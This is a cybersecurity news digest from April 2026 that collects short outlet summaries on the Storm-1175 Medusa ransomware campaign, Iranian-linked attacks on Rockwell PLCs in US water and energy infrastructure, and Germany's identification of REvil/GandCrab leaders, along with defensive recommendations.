Storm-1175, a financially motivated cybercrime group, has been exploiting n-day and zero-day vulnerabilities in Medusa ransomware attacks, impacting healthcare, education, professional services, and finance sectors in Australia, the UK, and the US. Since 2023, they have exploited at least 16 vulnerabilities, including CVE-2025-10035. Microsoft recommends using perimeter scanning tools, isolating web-facing systems, and employing web application firewalls (WAF) to mitigate risks.
2026-04-07 | CSO Online: Microsoft says Medusa-linked Storm-1175 is speeding ransomware attacks
Microsoft has issued a warning regarding Storm-1175, a cybercrime group associated with Medusa ransomware, which is rapidly executing ransomware attacks. The group targets vulnerable web-facing systems, often transitioning from initial access to data theft and ransomware deployment within 24 hours. Key sectors affected include healthcare, education, professional services, and finance in Australia, the UK, and the US. Storm-1175 has also exploited zero-day vulnerabilities prior to their public disclosure.
2026-04-07 | Security Affairs: Fast-moving Storm-1175 uses new exploits to breach networks and drop Medusa
China-based actor Storm-1175 conducts rapid ransomware attacks, exploiting newly disclosed vulnerabilities to deploy Medusa ransomware within 24 hours. Targeting sectors like healthcare and finance in the US, UK, and Australia, they leverage flaws in platforms such as Microsoft Exchange and Ivanti. The group uses advanced techniques, including zero-day exploits, credential theft, and lateral movement, while modifying antivirus settings to evade detection. Microsoft has provided IoCs and mitigation guidance for these threats.
2026-04-08 | TechRadar: Microsoft flags China-based hackers using vicious new 'rapid attack' zero-days to launch ransomware at targets across the world
Chinese-speaking hacking group Storm-1175 is rapidly transitioning from initial access to ransomware deployment, often within 24 hours. They exploit both zero-day and n-day vulnerabilities across multiple products, including Microsoft Exchange (CVE-2023-21529) and others. Targeting healthcare, finance, education, and professional services, their operations have been noted primarily in the US, UK, and Australia. They disable antivirus tools before deploying Medusa ransomware, leveraging over 16 identified vulnerabilities.
2026-04-08 | Hack Read: Storm-1175 Deploys Medusa Ransomware Within 24 Hours of Flaw Disclosure
Storm-1175, a hacker group, rapidly deploys Medusa ransomware, exploiting vulnerabilities within 24 hours of their disclosure. They target perimeter assets lacking security updates, focusing on N-day vulnerabilities. Recent attacks include exploiting CVE-2025-31324 on SAP NetWeaver and CVE-2023-27351 on Papercut. The group uses tools like AnyDesk and PDQ Deployer to spread ransomware and disable antivirus defenses. Experts recommend faster update installations and employing Tamper Protection to enhance security.
Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure
Date: 2026-04-06 | Source: CISA Cybersecurity Advisories
Iranian-affiliated APT actors are exploiting internet-facing Rockwell Automation/Allen-Bradley PLCs across U.S. critical infrastructure, causing operational disruptions and financial losses. The FBI and CISA recommend organizations review TTPs and IOCs, disconnect PLCs from the internet, and implement security measures including MFA and secure gateways. Malicious interactions with project files and data manipulation on HMI/SCADA displays have been reported. Affected sectors include Government Services, Water, and Energy.
2026-04-07 | Cyberscoop: Iranian hackers launching disruptive attacks at U.S. energy, water targets, feds warn
Iranian government hackers are conducting disruptive cyberattacks on U.S. energy and water infrastructure, targeting internet-facing operational technology devices, including Rockwell Automation PLCs. A joint alert from U.S. agencies indicates these attacks have caused operational disruptions and financial losses across multiple critical infrastructure sectors. The activity intensified following U.S.-Israel strikes against Iran, with previous warnings issued after an attack on a Pennsylvania water facility in late 2023.
2026-04-07 | TechCrunch: Iranian hackers are targeting American critical infrastructure, US agencies warn
Iranian-backed hackers are targeting U.S. critical infrastructure, including water, energy, and local government systems, according to a joint advisory from the FBI, NSA, CISA, and the Department of Energy. The hackers exploit internet-facing systems, manipulating programmable logic controllers and SCADA products, leading to operational disruptions and financial losses. This escalation follows the U.S.-Israel conflict, with the group Handala linked to prior attacks, including a breach at medical tech firm Stryker.
2026-04-07 | Wired: Iran-Linked Hackers Are Sabotaging US Energy and Water Infrastructure
Iranian hackers have targeted US energy and water infrastructure, compromising industrial control systems, including programmable logic controllers (PLCs) from Rockwell Automation. A joint advisory from the FBI, NSA, Department of Energy, and CISA warns of operational disruptions and financial losses due to these attacks. The hacking campaign is linked to the Iran-affiliated group CyberAv3ngers, known for previous attacks on Israeli and US targets. Rockwell Automation is coordinating with agencies to enhance PLC security.
2026-04-07 | Recorded Future: FBI, Pentagon warn of Iran hacking groups targeting operational technology
Hackers affiliated with Iran are targeting U.S. critical infrastructure, specifically internet-facing operational technology (OT) devices, causing operational disruptions and financial losses. The FBI and other agencies reported attacks on PLCs from Rockwell Automation and Siemens, affecting municipal governments and water systems. The advisory highlights CVE-2021-22681, urging organizations to patch vulnerabilities and remove OT from direct internet exposure. The campaign is linked to previous Iranian attacks on critical infrastructure.
2026-04-07 | The Register: Iran cyber actors disrupting US water, energy facilities, FBI warns
Iranian-affiliated cyber actors are increasingly targeting US water and energy facilities, disrupting operations, according to a joint alert from the FBI and other agencies. The attacks focus on Rockwell Automation/Allen-Bradley PLCs, with the group CyberAv3ngers exploiting default passwords to gain access. Recent activities include deploying custom malware to manipulate data on OT devices. Recommendations include patching systems, enabling multi-factor authentication, and disconnecting internet-exposed PLCs.
2026-04-08 | The Hacker News: Iran-Linked Hackers Disrupt U.S. Critical Infrastructure by Targeting Internet-Exposed PLCs
Iran-affiliated hackers are targeting U.S. critical infrastructure by exploiting internet-facing PLCs, causing operational disruptions and financial losses. The FBI reported that these attacks involve manipulating PLC data and using third-party software for unauthorized access. Key sectors affected include government services, water systems, and energy. Recommendations include avoiding internet exposure, implementing MFA, and monitoring unusual traffic. The advisory highlights a broader trend of Iranian cyber escalation against both IT and OT infrastructures.
2026-04-08 | Security Affairs: U.S. agencies alert: Iran-linked actors target critical infrastructure PLCs
U.S. agencies, including the FBI and CISA, warn that Iran-linked hackers are targeting internet-exposed Rockwell/Allen-Bradley PLCs in critical infrastructure, causing operational disruptions and financial losses. The advisory highlights attacks involving manipulation of project files and data on HMI and SCADA systems. Organizations are urged to assess exposed devices, disconnect from the internet, and follow security guidance. The campaign is linked to the IRGC-affiliated group CyberAv3ngers, which has compromised at least 75 devices since November 2023.
2026-04-08 | Infosecurity Magazine: Iran-Backed Threat Actors Hit US CNI Providers via Internet-Facing OT Assets
Iranian-affiliated hackers have targeted US critical national infrastructure (CNI) providers, causing operational disruptions and financial losses. The Cybersecurity and Infrastructure Security Agency (CISA) advisory from April 7 highlights attacks on internet-facing operational technology (OT) assets, particularly Rockwell Automation PLCs. Recommendations include using secure gateways, monitoring logs for indicators of compromise, and ensuring physical security of devices. Experts emphasize the need for improved visibility and incident response plans in OT environments.
2026-04-08 | Help Net Security: Iranian cyber activity hits US energy, water, and government networks
U.S. government agencies warned of ongoing Iranian cyber activity targeting operational technology (OT) and programmable logic controllers (PLCs) in critical infrastructure sectors, including energy and water. The activity has caused disruptions through malicious interactions with project files and data manipulation on HMI and SCADA systems. Recommendations include disconnecting PLCs from the internet, limiting remote access, and regularly testing backups to ensure recovery from potential compromises.
2026-04-08 | CSO Online: Iran-linked PLC attacks cause real-world disruption at critical US infra sites
Iran-affiliated threat actors have compromised internet-exposed programmable logic controllers (PLCs) at critical US infrastructure facilities, including water, energy, and government sectors, since at least March 2026. The advisory, co-authored by multiple federal agencies, links these attacks to rising tensions between Iran and the US and Israel. Victims reported operational disruptions and financial losses. The targeted PLCs include those from Rockwell Automation and Allen-Bradley.
2026-04-08 | Cybersecurity Dive: Iran-linked hackers target water, energy in US, FBI and CISA warn
Iran-linked hackers have targeted U.S. critical infrastructure, including water and energy sectors, exploiting vulnerabilities in Rockwell Automation's programmable logic controllers (PLCs). The FBI and CISA reported data manipulation incidents causing financial losses and operational disruptions. A specific authentication bypass vulnerability (CVE-2021-22681) was highlighted, urging organizations to enhance security measures. Over 3,000 Rockwell devices remain exposed on the public internet, increasing the risk of exploitation.
2026-04-08 | TechRadar: US agencies warn Iranian hackers are targeting American critical infrastructure — causing 'disruptive effects within the United States'
US agencies, including the FBI and CISA, issued a security advisory regarding ongoing Iranian cyberattacks targeting American critical infrastructure, specifically Rockwell Automation/Allen-Bradley PLCs. These attacks aim to exploit operational technology devices, causing disruptions and financial losses across sectors like Government Services, Water, and Energy. The advisory highlights potential links to a ransomware attack at a North Dakota water treatment plant, though no direct connection has been confirmed.
2026-04-08 | Security Magazine: Iranian-Linked Cyber Actors Target US Critical Infrastructure, Security Leaders Respond
Iranian cyber actors are targeting U.S. critical infrastructure, including water, energy, and government services, according to a CISA warning. Security experts emphasize the increased sophistication of attacks, leveraging AI for social engineering and credential theft. Notable incidents include a wiper attack on Stryker. Organizations are advised to enhance defenses by restricting internet access to operational technology, enforcing multi-factor authentication, and adopting zero standing privilege models to mitigate risks from potential cyber warfare.
2026-04-08 | Ars Technica: Iran-linked hackers disrupt operations at US critical infrastructure sites
Hackers linked to the Iranian government are disrupting operations at multiple US critical infrastructure sites, targeting programmable logic controllers (PLCs) since at least March 2026. An advisory from several US agencies warns of operational disruptions and financial losses across sectors like Government Services, Waste Water Systems, and Energy. Rockwell Automation/Allen-Bradley PLCs are particularly affected, with 5,219 devices exposed online, 75% of which are in the US.
2026-04-09 | Cybersecurity Dive: NERC is ‘actively monitoring the grid’ following Iran-linked cyber threat
Hackers affiliated with Iran are targeting programmable logic controllers (PLCs) in critical sectors, including power and water, as per a CISA advisory. NERC is actively monitoring the grid and coordinating with the DOE. The advisory warns of operational disruptions due to malicious interactions with PLCs, urging U.S. organizations to review security measures. Rockwell Automation's PLCs were specifically mentioned, with recommendations for enhancing security. The advisory highlights the urgency amid escalating tensions between the U.S. and Iran.
2026-04-09 | Cyberscoop: Iranian attacks on US critical infrastructure puts 3,900 devices in crosshairs
Iranian state-backed attacks have targeted over 5,200 internet-connected devices in U.S. critical infrastructure, with nearly 3,900 being Rockwell Automation/Allen-Bradley programmable logic controllers (PLCs). The devices, primarily in the energy and water sectors, are at risk due to their cellular connections, with many running end-of-life software. Federal agencies issued a joint alert detailing the vulnerabilities, which have led to financial losses for some victims. The attacks have been ongoing since March.
2026-04-10 | Cyber Security News: Censys Warns 5,219 Rockwell/Allen-Bradley PLCs Are Exposed Amid Iranian APT Activity
On April 7, 2026, U.S. agencies warned that Iranian APT actors are targeting Rockwell Automation/Allen-Bradley PLCs, with 5,219 exposed globally, primarily in the U.S. (3,891 hosts). The attackers, linked to the IRGC-CEC, exploit legitimate software to manipulate PLCs, posing risks to critical infrastructure. Recommendations include removing devices from internet exposure, disabling vulnerable services, and implementing multi-factor authentication. Key protocols under threat include EtherNet/IP, Modbus, and Telnet.
2026-04-10 | Cybersecurity Dive: Nearly 4K industrial control devices vulnerable to Iran-linked hacking campaign
Iran-linked hackers are targeting over 5,000 industrial control devices globally, with approximately 3,900 in the U.S. U.S. agencies warn that these hackers are compromising Rockwell Automation's Allen-Bradley PLCs, primarily through cellular modems and satellite connections. Many devices are accessible via insecure protocols like HTTP, VNC, and Telnet, expanding the attack surface. Censys recommends disconnecting PLCs from the internet, logging suspicious traffic, and implementing multifactor authentication for remote access.
2026-04-11 | Security Affairs: Censys finds 5,219 devices exposed to attacks by Iranian APTs, majority in U.S.
Censys identified 5,219 exposed Rockwell PLCs, primarily in the U.S. (74.6%), vulnerable to Iranian APT attacks. U.S. agencies warned that these actors target operational technology in critical infrastructure, manipulating project files and HMI/SCADA data, causing disruptions. Many devices run outdated firmware and are accessible via cellular networks. Recommendations include securing or disconnecting devices, reviewing indicators of compromise, and following vendor security guidance.
2026-04-13 | Cyber Security News: Iran-Linked CyberAv3ngers Sets Sights on Water Utilities and Industrial Controllers
An Iran-backed cyber group, CyberAv3ngers, has targeted U.S. critical infrastructure, exploiting vulnerabilities in internet-facing PLCs. A joint advisory from six U.S. agencies confirmed operational disruptions linked to the group, which has compromised at least 75 PLCs. They exploited CVE-2021-22681, a critical flaw in Rockwell Automation controllers, with no patch available. Their advanced malware, IOCONTROL, blends into IoT traffic, complicating detection. Organizations are urged to disconnect affected devices and enhance security measures.
Germany Doxes “UNKN,” Head of RU Ransomware Gangs REvil, GandCrab
Date: 2026-04-06 | Source: Krebs on Security
German authorities have identified Daniil Maksimovich Shchukin, 31, as the head of the ransomware groups GandCrab and REvil, responsible for over 130 cyberattacks from 2019 to 2021, causing more than 35 million euros in damages. Shchukin and accomplice Anatoly Kravchuk extorted nearly 2 million euros. The BKA linked Shchukin to a digital wallet with over $317,000 in cryptocurrency. REvil, known for double extortion tactics, targeted large organizations, including a significant attack on Kaseya in July 2021.
2026-04-06 | The Hacker News: BKA Identifies REvil Leaders Behind 130 German Ransomware Attacks
Germany's BKA has identified Daniil Maksimovich Shchukin, alias UNKN, as a leader of the REvil ransomware group, responsible for 130 attacks in Germany, resulting in €1.9 million in ransom payments and over €35.4 million in damages. Also wanted is Anatoly Sergeevitsch Kravchuk, a developer for REvil. The group, linked to high-profile victims like JBS and Kaseya, ceased operations in 2021 following law enforcement actions, including arrests by Russia's FSB.
2026-04-06 | Security Affairs: BKA unmasks two REvil Ransomware operators behind 130+ German attacks
Germany's federal police, the BKA, identified two key members of the REvil ransomware group, Daniil Maksimovich Shchukin (31) and Anatoly Sergeevitsch Kravchuk (43), linking them to over 130 attacks in Germany between 2019 and 2021. They extorted nearly €2 million and caused over €35 million in damages. Shchukin, known as UNKN, promoted ransomware on cybercrime forums and is wanted internationally. Both suspects are believed to be in Russia; Shchukin was previously associated with the GandCrab group.
2026-04-06 | Recorded Future: German police unmask two suspects linked to REvil ransomware gang
German authorities have identified Daniil Shchukin and Anatoly Kravchuk as suspects linked to the REvil and GandCrab ransomware gangs. They are believed to be responsible for around two dozen attacks, generating nearly $2.3 million in extorted payments and causing over $40 million in damages. Both men are currently in Russia and are wanted internationally. REvil, dismantled in 2021, targeted high-profile victims and operated under a ransomware-as-a-service model.
2026-04-07 | TechRadar: Goodnight REvil and GandCrab? Police think they've identified two of the biggest cybercrime bosses around
German police have identified two Russian nationals, Daniil Maksimovich Shchukin and Anatoly Sergeevich Kravchuk, as key operators of the GandCrab/REvil ransomware groups. They are sought for extorting over €35 million from 130 German victims between early 2019 and July 2021. The authorities believe they are currently in Russia and are asking the public for assistance in locating them. GandCrab was a major ransomware player, operating under a Ransomware-as-a-Service model, before its shutdown in mid-2019.